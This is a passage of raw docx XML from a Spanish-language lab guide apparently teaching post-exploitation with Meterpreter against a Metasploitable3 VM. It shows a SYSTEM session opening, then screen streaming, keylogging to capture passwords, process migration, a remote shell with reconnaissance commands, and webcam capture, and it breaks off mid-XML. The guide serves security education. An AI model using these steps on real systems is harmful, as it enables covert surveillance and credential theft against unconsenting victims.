        <w:t xml:space="preserve">[+] 172.28.128.X:445 - Service start timed out, OK if running a command or non-service executable...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Sending stage (201798 bytes) to 172.28.128.X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened</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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Verificar la sesión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; getuid    # debe mostrar NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; getpid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Actividad 1 — Stream de Pantalla (screenshare)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meterpreter incluye el comando screenshare que abre un stream de video de la pantalla de la víctima en el navegador de Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Iniciar el stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; screenshare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Abre automáticamente http://127.0.0.1:&lt;puerto&gt; en el browser de Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Presiona Ctrl+C para detenerlo cuando termines</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B82F6" w:sz="4"/>
              <w:left w:val="single" w:color="3B82F6" w:sz="16"/>
              <w:bottom w:val="single" w:color="3B82F6" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">ℹ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">El stream se sirve localmente en Kali. Para verlo desde el host Windows necesitarías tunelear el puerto, pero en este lab basta con abrir el browser dentro de la VM de Kali.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Captura de pantalla estática</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para tomar una sola captura en lugar de un stream:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; screenshot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Guarda un .jpeg en el directorio donde lanzaste msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Actividad 2 — Captura de Teclado (Keylogger)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meterpreter tiene un keylogger integrado que captura las pulsaciones del proceso indicado o del proceso activo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Migrar al proceso correcto (opcional pero recomendado)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para capturar entradas del escritorio, migramos a un proceso interactivo como explorer.exe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; ps           # listar procesos, buscar explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; migrate &lt;PID_de_explorer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Iniciar la captura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># El keylogger corre en background — ve a la VM win2k8 y escribe algo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># (simula que el usuario teclea una contraseña, un mensaje, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Volcar las pulsaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; keyscan_dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Mostrará todo lo que fue escrito en la víctima</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Detener el keylogger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; keyscan_stop</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F59E0B" w:sz="4"/>
              <w:left w:val="single" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBCC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">Las teclas especiales aparecen como &lt;Return&gt;, &lt;Back&gt;, &lt;Tab&gt;, etc. Las contraseñas suelen verse en texto claro si el usuario tipea en un campo de login no cifrado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Actividad 3 — Acceso a la Consola Remota (Shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meterpreter permite abrir una consola de comandos interactiva de Windows directamente desde Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Abrir la shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell</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Process 1234 created.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Channel 2 created.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows [Version 6.1.7601]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Comandos de exploración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; net user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; net localgroup administrators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; dir C:\Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; tasklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Volver a Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># O presiona Ctrl+Z para poner la shell en background</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B82F6" w:sz="4"/>
              <w:left w:val="single" w:color="3B82F6" w:sz="16"/>
              <w:bottom w:val="single" w:color="3B82F6" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">ℹ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">Desde la shell puedes ejecutar cualquier comando de Windows. Se corre como SYSTEM, por lo que tienes acceso total al sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Actividad 4 — Acceso a la Cámara Web (Webcam)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meterpreter incluye comandos para listar y capturar imágenes desde cámaras conectadas al sistema víctima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Listar cámaras disponibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; webcam_list</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F59E0B" w:sz="4"/>
              <w:left w:val="single" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBCC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">En Metasploitable3 (VM de VirtualBox) normalmente no habrá una cámara detectada a menos que configures el passthrough de USB en VirtualBox apuntando a una cámara física del host. Si webcam_list retorna "0 webcam(s) found", continúa al paso 8.3 para la configuración opcional.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Capturar una foto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; webcam_snap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
